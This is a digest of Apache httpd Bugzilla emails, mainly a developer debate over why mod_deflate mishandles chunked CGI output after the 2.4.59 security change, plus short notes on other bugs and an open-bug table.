Basically, revert the code change. > 2. Declare victory as Apache httpd is now finally following the standard(s) > 3. Disable mod_deflate > 4. Convert our CGI processes to be NPH #1 isn't likely when we could just add or extend an opt-out as described in Comment #7 > Maybe we could allow extend the "ap_trust_cgilike_cl" interpretation to also > allow T-E. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #17 from Allan Schrum --- You arguments indicate that you believe this should never have worked. Fine, I accept that. However, it did work for a very long time and it is now broken. Perhaps this worked because previously the code treated the output from CGI as a transfer hop so Transfer-Encoding worked as Apache read the output from the CGI process. It was mentioned that the code change that "broke" this now clears the transfer encoding variable arbitrarily. Perhaps it should only be cleared if Content-Length is provided? So it seems like the options are: 1. Go back to the previous behavior for mod_deflate so that the chunked output from the CGI script is properly read as part of the activities of mod_deflate. 1.a. This might need to be more generic and apply to anything reading the output of the CGI process, not simply mod_deflate. 1.b. Basically, revert the code change. 2. Declare victory as Apache httpd is now finally following the standard(s) 3. Disable mod_deflate 4. Convert our CGI processes to be NPH The NPH approach is odd because its existence means that the standard CGI response does have headers which are parsed by the daemon. If this worked previously because the output of the CGI process was treated as a transfer hop so that the Transfer-Encoding header was parsed and understood by the daemon, I'd prefer we go back to that behavior. It is clean, simple, and still fits within the concepts of CGI. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #16 from Joe Orton --- (In reply to Ruediger Pluem from comment #13) > I have serious trouble to understand how that should have ever worked with > mod_deflate even before 2.4.59. Ah, good point. I tested with 2.4.52 and it compresses the entire response body including chunk-size lines (1). So yeah, not obvious at all how this ever worked with DEFLATE configured. GET /cgi-bin/big-chunks.pl HTTP/1.1 Host: localhost:8052 Accept-Encoding: deflate, gzip HTTP/1.1 200 OK Date: Fri, 10 May 2024 08:07:07 GMT Server: Apache/2.4.52 (Unix) OpenSSL/3.0.9 Transfer-Encoding: chunked Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 67 Content-Type: text/plain �A ��%�e�:�Ls��5��'�i� 7^�@^C -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #15 from Ruediger Pluem --- (In reply to Allan Schrum from comment #10) > > With 2.4.59 that is not what is happening. The output of the CGI process has > all its headers thrown away so that the content cannot be processed. Those > headers are part of the CGI response and are allowed by standard. I don't > understand why years of processing these types of responses suddenly must > treat Transfer-Encoding as something magical to be disregarded. https://datatracker.ietf.org/doc/html/rfc3875#section-6.3.4: The script MUST NOT return any header fields that relate to client-side communication issues and could affect the server's ability to send the response to the client. The server MAY remove any such header fields returned by the client. It SHOULD resolve any conflicts between header fields returned by the script and header fields that it would otherwise send itself. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #14 from Ruediger Pluem --- (In reply to Allan Schrum from comment #10) > > Enter mod_deflate. It wants to change the response of any request (not > necessarily just a CGI response) so that it is compressed to reduce network > load. To do so it must insert itself in the response stream. Within this > conceptual httpd daemon it should be at the output of the daemon acting as > an intermediate client. It reads the HTTP response from the daemon, > compresses it, wraps it with chunked output, and sends it on its way. Using > this conceptual model, with mod_deflate between the Apache httpd daemon and > the client, mod_deflate must properly read the response in order to compress > the response. This might mean de-chunking that response in order for it to > be compressed. Unfortunately your understanding on how this works is wrong. mod_deflate is applied before the HTTP protocol layer. mod_deflate expects a byte stream as input not a HTTP response that can have a transfer encodings applied. Of course mod_deflate interacts with the HTTP protocol by taking care to unset a e.g. Content-Length or Content-MD5 header as they get invalid due to the compression. It also adjusts ETag headers if requested. But the response body is just taken as is and not subject to any dechunking. Hence my question elsewhere for a minimal configuration that demonstrates that this works with mod_deflate prior to 2.4.59. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #13 from Ruediger Pluem --- (In reply to Allan Schrum from comment #12) > You missed the first post which showed 2.4.59 with mod_deflate disabled > allowed the request to process correctly. It demonstrated that mod_deflate > is the critical difference that causes the problem. Exactly why this is > caused by mod_deflate is an internal discussion but it was pointed out > exactly which commit induces this problem. > > Viewed different, this has been working correctly since 2010. For it to > suddenly stop working should be the issue. How to interpret CGI is missing > the point that this had been working from Apache httpd 2.2.x until 2.4.59. > Now it is broken. I have serious trouble to understand how that should have ever worked with mod_deflate even before 2.4.59. Hence I asked for a minimal configuration that makes it possible to understand if and how that could ever worked. Unfortunately this configuration was never given. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #12 from Allan Schrum --- You missed the first post which showed 2.4.59 with mod_deflate disabled allowed the request to process correctly. It demonstrated that mod_deflate is the critical difference that causes the problem. Exactly why this is caused by mod_deflate is an internal discussion but it was pointed out exactly which commit induces this problem. Viewed different, this has been working correctly since 2010. For it to suddenly stop working should be the issue. How to interpret CGI is missing the point that this had been working from Apache httpd 2.2.x until 2.4.59. Now it is broken. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68907] replace ap_trust_cgilike_cl with a validating CL filter
https://bz.apache.org/bugzilla/show_bug.cgi?id=68907 m4pfeif...@gmail.com changed: What|Removed |Added CC||m4pfeif...@gmail.com -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 Joe Orton changed: What|Removed |Added Component|mod_deflate |mod_cgi --- Comment #11 from Joe Orton --- mod_deflate has nothing to do with this AFAICT. A CGI script producing T-E: chunked output will fail in the way you describe with or without mod_deflate configured. mod_deflate applies a content-coding to the CGI output and this is done trivially without the CGI script output needing to use HTTP/1.1 message framing. This is even covered in https://datatracker.ietf.org/doc/html/rfc3875#section-6.4 > Apache httpd should leave it alone and simply send it back without touching it You can interpret this quite literally for 2.4.59+ - the CGI response is read until EOF (as described in the CGI spec) and that response body is exactly what the client will read, with appropriate HTTP message framing applied. > This different interpretation on how CGI works seems against the standard Please can you be specific - which standard, in what way? FWIW - a CGI script unconditionally producing T-E: chunked output will also definitely violate HTTP/1.0 since 1.0 clients cannot parse chunked transfer-coding. This is why it is appropriate for httpd to handle the HTTP message framing, not the CGI script. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #10 from Allan Schrum --- This different interpretation on how CGI works seems against the standard. The httpd daemon, when processing a request that is answered by a CGI process, handles all the networking and connection management, setup up the CGI environment, and hands off the processing of the request to the CGI process. The CGI process is required to return a sane response with message headers and message body. The response is sent back to the client with the daemon responsible for any transport translation as necessary. In this example the CGI response is following the standard and returning a set of headers that identifies the content for an HTTP response. Apache httpd should leave it alone and simply send it back without touching it. Had that happened there would not be a problem. Enter mod_deflate. It wants to change the response of any request (not necessarily just a CGI response) so that it is compressed to reduce network load. To do so it must insert itself in the response stream. Within this conceptual httpd daemon it should be at the output of the daemon acting as an intermediate client. It reads the HTTP response from the daemon, compresses it, wraps it with chunked output, and sends it on its way. Using this conceptual model, with mod_deflate between the Apache httpd daemon and the client, mod_deflate must properly read the response in order to compress the response. This might mean de-chunking that response in order for it to be compressed. With 2.4.59 that is not what is happening. The output of the CGI process has all its headers thrown away so that the content cannot be processed. Those headers are part of the CGI response and are allowed by standard. I don't understand why years of processing these types of responses suddenly must treat Transfer-Encoding as something magical to be disregarded. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #9 from Joe Orton --- Transfer-Encoding is not just any header, it is a header used for HTTP message framing. It has no place in CGI output because the response message body framing used between the CGI script and the application server is "read all bytes to EOF" - per my previous comment. At least for mod_cgi* I think it would be better to return an error if the CGI output contains Transfer-Encoding, rather than produce corrupt output. Blindly trusting that a CGI script produces correct HTTP message framing allows the "desynchronisation attack" called CVE-2024-24795. It would be absurd for mod_cgi* to try to parse CGI output using the complete HTTP/1.1 message framing logic (like removing transfer-codings) because there is no *such requirement for CGI script output*. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68906] When a directory is named “core”, a bomb icon is displayed in FancyIndex
https://bz.apache.org/bugzilla/show_bug.cgi?id=68906 --- Comment #1 from Joe Orton --- This is how AddIcon in the default configuration is expected to work. It is not ideal - in Fedora we had enough complaints that we switched to using AddIconByType and added a mime type for core dumps. https://src.fedoraproject.org/rpms/httpd/blob/rawhide/f/httpd-2.4.54-icons.patch -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #8 from Allan Schrum --- What about the headers sent back by the CGI process? Those headers indicate that a chunked response is being generated for the response body. The focus on the response body seems to ignore the headers that were returned that identified how the response body should be interpreted. That is the defect here. Previously, the response body was properly processed presumably because the headers returned were properly read and understood. A response body is not returned in isolation where interpretation of the content is random or problematic. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #7 from Joe Orton --- This is surely a consequence of r1916769 which clears Transfer-Encoding (unconditionally). IMO there is not well-defined behaviour from having CGI scripts send chunked responses. In CGI the response body is a set of bytes delimited by EOF. The CGI spec is arguably not written in precise enough language that sending a chunked response is not explicitly disallowed but it is hardly obvious that it's correct/supported. https://datatracker.ietf.org/doc/html/rfc3875#section-6.4 The response body is clearly defined as "a set of bytes delimited by EOF". A response body with the chunked transfer-coding applied is obviously is a very different thing. Regardless, we have a long history of having to clamp down on spec ambiguity to avoid security issues, and CVE-2024-24795 is another such case. Things which happened to work historically will no longer work and users should adapt accordingly. Maybe we could allow extend the "ap_trust_cgilike_cl" interpretation to also allow T-E. We do happen to have one test case for a CGI script sending a chunked response - which seems to work still, likely because it's only five bytes of content. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
Bug report for Apache httpd-2 [2024/05/05]
+---+ | Bugzilla Bug ID | | +-+ | | Status: UNC=Unconfirmed NEW=New ASS=Assigned| | | OPN=ReopenedVER=Verified(Skipped Closed/Resolved) | | | +-+ | | | Severity: BLK=Blocker CRI=Critical REG=Regression MAJ=Major | | | | MIN=Minor NOR=NormalENH=Enhancement TRV=Trivial | | | | +-+ | | | | Date Posted | | | | | +--+ | | | | | Description | | | | | | | |10747|New|Maj|2002-07-12|ftp SIZE command and 'smart' ftp servers results i| |11580|Opn|Enh|2002-08-09|generate Content-Location headers | |12033|Opn|Nor|2002-08-26|Graceful restart immediately result in [warn] long| |13661|Ass|Enh|2002-10-15|Apache cannot not handle dynamic IP reallocation | |14104|Opn|Enh|2002-10-30|not documented: must restart server to load new CR| |16811|Ass|Maj|2003-02-05|mod_autoindex always return webpages in UTF-8.| |17244|Ass|Nor|2003-02-20|./configure --help gives false information regardi| |17497|Opn|Nor|2003-02-27|mod_mime_magic generates incorrect response header| |20036|Ass|Nor|2003-05-19|Trailing Dots stripped from PATH_INFO environment | |21260|Opn|Nor|2003-07-02|CacheMaxExpire directive not enforced ! | |21533|Ass|Cri|2003-07-11|Multiple levels of htacces files can cause mod_aut| |22484|Opn|Maj|2003-08-16|semaphore problem takes httpd down| |22686|Opn|Nor|2003-08-25|ab: apr_poll: The timeout specified has expired (7| |22898|Opn|Nor|2003-09-02|nph scripts with two HTTP header | |23911|Opn|Cri|2003-10-18|CGI processes left defunct/zombie under 2.0.54| |24095|Opn|Cri|2003-10-24|ERROR "Parent: child process exited with status 32| |24437|Opn|Nor|2003-11-05|mod_auth_ldap doubly-escapes backslash (\) charact| |24890|Opn|Nor|2003-11-21|Apache config parser should not be local aware ( g| |25469|Opn|Enh|2003-12-12|create AuthRoot for defining paths to auth files | |25484|Ass|Nor|2003-12-12|Non-service Apache cannot be stopped in WinXP | |26153|Opn|Cri|2004-01-15|Apache cygwin directory traversal vulnerability | |27257|Ass|Enh|2004-02-26|rotatelogs with getopt and setuid | |27715|Ass|Enh|2004-03-16|Client sending misformed Range "bytes = 0-100" ins| |29090|Ass|Enh|2004-05-19|MultiviewsMatch NegotiatedOnly extensions not resp| |29510|Ass|Enh|2004-06-10|ab does not support multiple cookies | |29644|Ver|Nor|2004-06-17|mod_proxy keeps downloading even after the client | |30259|Ass|Enh|2004-07-22|When proxy connects to backend, a DNS lookup is do| |30505|Ass|Enh|2004-08-05|Apache uses 'Error', and not lower level event typ| |31302|Opn|Cri|2004-09-19|suexec doesn't execute commands if they're not in | |31352|Ass|Enh|2004-09-21|RFE, Bind to LDAP server with browser supplier use| |31418|Opn|Nor|2004-09-25|SSLUserName is not usable by other modules| |32328|Opn|Enh|2004-11-19|Make mod_rewrite escaping optional / expose intern| |32750|Ass|Maj|2004-12-17|mod_proxy + Win32DisableAcceptEx = memory leak| |33089|New|Nor|2005-01-13|mod_include: Options +Includes (or IncludesNoExec)| |34519|New|Enh|2005-04-19|Directory index should emit valid XHTML | |35098|Ver|Maj|2005-05-27|Install fails using --prefix | |35154|Opn|Nor|2005-06-01|Support for NID_serialNumber, etc. in SSLUserName | |35652|Opn|Min|2005-07-07|Improve error message: "pcfg_openfile: unable to c| |35768|Opn|Nor|2005-07-17|Missing file logs at far too high of log level| |36676|New|Nor|2005-09-15|time() bug in httpd/os/win32/util_win32.c:wait_for| |36710|Opn|Blk|2005-09-19|CGI output not captured | |37006|Ver|Reg|2005-10-11|"pthread" error when compiling under AIX 5.3 using| |37290|Opn|Min|2005-10-28|DirectoryIndex don't work in scriptaliased directo| |37564|New|Enh|2005-11-19|Suggestion: mod_suexec SuexecUserGroup directive i| |38325|Opn|Nor|2006-01-20|impossible to determine AUTH_TYPE of interpreted r| |38571|New|Enh|2006-02-08|CustomLog directive checked by apachectl configtes| |38995|New|Nor|2006-03-16|httpd tries to communicate with the CGI daemon eve| |39275|Opn|Nor|2006-04-11|slow child_init causes MaxClients warning | |39287|New|Nor|2006-04-12|Incorrect If-Modified-Since validation (due to syn| |39727|Ass|Nor|2006-06-05|Incorrect ETag on gzip:ed content | |39748|New|Enh|2006-06-07|Header and POST support for
[Bug 68976] Sell Your House Fast In Cleveland
https://bz.apache.org/bugzilla/show_bug.cgi?id=68976 Sell Your House Fast In Cleveland changed: What|Removed |Added OS||All URL||https://www.ohhomesolutions ||.com/ -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68976] New: Sell Your House Fast In Cleveland
https://bz.apache.org/bugzilla/show_bug.cgi?id=68976 Bug ID: 68976 Summary: Sell Your House Fast In Cleveland Product: Apache httpd-test Version: unspecified Hardware: PC Status: NEW Severity: normal Priority: P2 Component: flood Assignee: bugs@httpd.apache.org Reporter: kemixen...@rehezb.com Target Milestone: --- We believe selling a house in Cleveland should be fast, and hassle-free. If you’re interested in selling your house in Cleveland, OH, we can buy your house with a fair all-cash offer. We work on your schedule, and best of all, when you sell to us, you sell it as-is. Walk away without doing any repairs. We’ll even clean out the property for you. It’s that easy. https://www.ohhomesolutions.com/ -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68973] New: Content-Length header missing in 2.4.59 is a breaking change
https://bz.apache.org/bugzilla/show_bug.cgi?id=68973 Bug ID: 68973 Summary: Content-Length header missing in 2.4.59 is a breaking change Product: Apache httpd-2 Version: 2.4.59 Hardware: PC OS: All Status: NEW Severity: blocker Priority: P2 Component: All Assignee: bugs@httpd.apache.org Reporter: webha...@backmail.eu Target Milestone: --- I believe that you are severely underestimating the negative consequences of your decision to remove the possibility to send the Content-Length header with the latest update 2.4.59. For decades, the Content-Length header has been used to determine the file size that is delivered through PHP. Existing software is relying on this value. For example, I am using this value in an update mechanism to show the file size to be downloaded. At the same time, this value indicates if there is a valid file to be delivered. If there is no file size, there is no valid file and the download isn't even started. It was not to be expected that this header would ever be removed, so it was relied upon. You will find hundreds of scripts on StackOverflow relying on this value. Existing software is relying on this value. This breaking change is not documented. There is no warning and the loss of Content-Length isn't even mentioned in the changelog: https://downloads.apache.org/httpd/CHANGES_2.4 I have now lost three full work days discussing this issue with my server provider and trying everything to find the reason and a solution for this issue. As I now learned in another topic here, this hidden change was part of a security fix and the only working solution is to adjust the trust level with htaccess like this: SetEnvIf Request_URI "\.php$" ap_trust_cgilike_cl While at least there is this workaround, this is still a breaking change and shoul be treated as such. Since it is not, it was possibly an unintentional change. I urge you to reverse this change so as not to break any more existing software. It would also be highly recommended to include a corresponding note for the current version 2.4.59 in the changelog. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #6 from Ruediger Pluem --- I did not mean the build configuration but the httpd configuration hence the stuff you have in httpd.conf and that you include there. Please strip it down to a minimal configuration that shows this behavior. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #5 from Allan Schrum --- No. Our environment is secured in such a way that network sniffs are not possible. For this environment we terminate at the edge and forward traffic to port 80. Our production environments are more secure. The server code was built with: function mpmbuild() { mpm=$1; sh`'`'ift mkdir $mpm; pushd $mpm ../configure \ --prefix=%{_sysconfdir}/httpd \ --exec-prefix=%{_prefix} \ --bindir=%{_bindir} \ --sbindir=%{_sbindir} \ --mandir=%{_mandir} \ --libdir=%{_libdir} \ --sysconfdir=%{_sysconfdir}/httpd/conf \ --includedir=%{_includedir}/httpd \ --libexecdir=%{_libdir}/httpd/modules \ --datadir=%{contentdir} \ --with-installbuilddir=%{_libdir}/httpd/build \ --with-mpm=$mpm \ --with-apr=%{_prefix} --with-apr-util=%{_prefix} \ --enable-suexec --with-suexec \ --with-suexec-caller=%{suexec_caller} \ --with-suexec-docroot=%{contentdir} \ --with-suexec-logfile=%{_localstatedir}/log/httpd/suexec.log \ --with-suexec-bin=%{_sbindir}/suexec \ --with-suexec-uidmin=500 --with-suexec-gidmin=100 \ --enable-systemd \ --enable-pie \ --with-pcre \ $* make %{?_smp_mflags} EXTRA_CFLAGS="-Werror-implicit-function-declaration" popd } prefork mpmbuild prefork \ --enable-mods-shared=all \ --enable-ssl --with-ssl \ --enable-proxy \ --enable-cache \ --enable-disk-cache \ --enable-ldap --enable-authnz-ldap \ --enable-cgid \ --enable-authn-anon --enable-authn-alias \ --disable-imagemap -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68971] eroare : mod_fcgid: error reading data from FastCGI server
https://bz.apache.org/bugzilla/show_bug.cgi?id=68971 Eric Covener changed: What|Removed |Added Status|NEW |NEEDINFO --- Comment #1 from Eric Covener --- No details -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68971] eroare : mod_fcgid: error reading data from FastCGI server
https://bz.apache.org/bugzilla/show_bug.cgi?id=68971 savin changed: What|Removed |Added URL||http://simpatie.site OS||All -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68971] New: eroare : mod_fcgid: error reading data from FastCGI server
https://bz.apache.org/bugzilla/show_bug.cgi?id=68971 Bug ID: 68971 Summary: eroare : mod_fcgid: error reading data from FastCGI server Product: Apache httpd-2 Version: 2.5-HEAD Hardware: PC Status: NEW Severity: normal Priority: P2 Component: mod_authnz_fcgi Assignee: bugs@httpd.apache.org Reporter: savintodir...@gmail.com Target Milestone: --- eroare : mod_fcgid: error reading data from FastCGI server -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 Ruediger Pluem changed: What|Removed |Added Status|NEW |NEEDINFO --- Comment #4 from Ruediger Pluem --- Please provide a minimal configuration that works with 2.4.58 and does not with 2.4.59. Please provide also the minimal configuration that works with 2.4.59 hence that it becomes more clear what changes in the configuration. The trace for the non working 2.4.59 case connects to port 80 and uses an unencrypted connection. Is it possible that you can provide network sniffs (not curl trace outputs) for all 3 cases (2.4.58, 2.4.59 not working, 2.4.59 working) using an unencrypted connection? -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 Allan Schrum changed: What|Removed |Added CC||allan.sch...@oracle.com -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #3 from Allan Schrum --- Created attachment 39694 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39694=edit curl --trace file for 2.4.59 without deflate showing proper processing of chunked response -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #2 from Allan Schrum --- Created attachment 39693 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39693=edit curl --trace file for 2.4.59 showing improper processing of chunked response -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 --- Comment #1 from Allan Schrum --- Created attachment 39692 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39692=edit curl --trace file for 2.4.58 showing proper processing of chunked response -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68970] New: mod_deflate no longer properly handles chunked responses from CGI scripts
https://bz.apache.org/bugzilla/show_bug.cgi?id=68970 Bug ID: 68970 Summary: mod_deflate no longer properly handles chunked responses from CGI scripts Product: Apache httpd-2 Version: 2.4.59 Hardware: Other OS: Linux Status: NEW Severity: regression Priority: P2 Component: mod_deflate Assignee: bugs@httpd.apache.org Reporter: allan.sch...@oracle.com Target Milestone: --- Created attachment 39691 --> https://bz.apache.org/bugzilla/attachment.cgi?id=39691=edit Raw chunked output from our CGI process Our CGI process handles SOAP requests. Based on the requests a multi-part MTOM response using Transfer-encoding: chunked is generated and sent back to Apache via stdout. On 2.4.58 the response is properly understood, de-chunked, compressed and re-chunked so that the client receives a proper response. The result is proper multi-part MTOM data of an XML document. On 2.4.59 the response is not understood and not de-chunked. Rather the whole chunked response from the CGI process is treated as binary data, compressed, re-chunked so that the client receives the raw output of the CGI process. As the resulting output is that raw, chunked output from the CGI process the client sees unrecognizable garbage rather than an XML response. On 2.4.59 if we disable mod_deflate then the result is returned to the client as expected: an MTOM response with an XML document. Enclosed are the following files to assist with this issue. xmlout21642.xml contains the raw, chunked output of our CGI process (without any headers). I've also included three trace files collected using curl --trace for the three test cases mentioned. You can see in those outputs the failure. The test files contain passwords that are harmless as these are internal test systems not accessible externally. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68863] Requests using a DH-key of 2048 bytes are blocked since httpd/2.4.59
https://bz.apache.org/bugzilla/show_bug.cgi?id=68863 Yann Ylavic changed: What|Removed |Added CC||chr...@majestic.com --- Comment #13 from Yann Ylavic --- *** Bug 68969 has been marked as a duplicate of this bug. *** -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68969] Diffie Hellman not working
https://bz.apache.org/bugzilla/show_bug.cgi?id=68969 Yann Ylavic changed: What|Removed |Added Resolution|--- |DUPLICATE Status|NEW |RESOLVED --- Comment #1 from Yann Ylavic --- This has addressed/fixed (not released yet) in bug 68863. *** This bug has been marked as a duplicate of bug 68863 *** -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68969] New: Diffie Hellman not working
https://bz.apache.org/bugzilla/show_bug.cgi?id=68969 Bug ID: 68969 Summary: Diffie Hellman not working Product: Apache httpd-2 Version: 2.4.59 Hardware: PC OS: Linux Status: NEW Severity: normal Priority: P2 Component: mod_ssl Assignee: bugs@httpd.apache.org Reporter: chr...@majestic.com Target Milestone: --- Diffie Hellman key exchange appears to have been removed from http-2.4.59. No ciphers which use DHE appear to be available in the new version -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 59396] Could not bind to an IPv6 listening socket with link-local scope id
https://bz.apache.org/bugzilla/show_bug.cgi?id=59396 --- Comment #6 from Joe Orton --- 2.4 backport PR: https://github.com/apache/httpd/pull/440 -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 45900] "make install" fails from read-only filesystem
https://bz.apache.org/bugzilla/show_bug.cgi?id=45900 Joe Orton changed: What|Removed |Added Status|NEW |RESOLVED Resolution|--- |FIXED --- Comment #1 from Joe Orton --- VPATH builds ($srcdir != $builddir) are tested in CI and expected to work in 2.4.x. -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 43533] Frequent crashes in mod_include's bndm()
https://bz.apache.org/bugzilla/show_bug.cgi?id=43533 Joe Orton changed: What|Removed |Added Status|REOPENED|RESOLVED Resolution|--- |INVALID --- Comment #7 from Joe Orton --- If you modify content in-place you will get undefined behaviour in various ways, so the best practice is to not do that. Disabling MMAP will avoid some but not all the problems. https://httpd.apache.org/docs/2.4/mod/core.html#enablemmap -- You are receiving this mail because: You are the assignee for the bug. - To unsubscribe, e-mail: bugs-unsubscr...@httpd.apache.org For additional commands, e-mail: bugs-h...@httpd.apache.org
[Bug 68959] Issue with SSI Truncating Response for Files > 32KB after Apache httpd 2.4.25 Upgrade
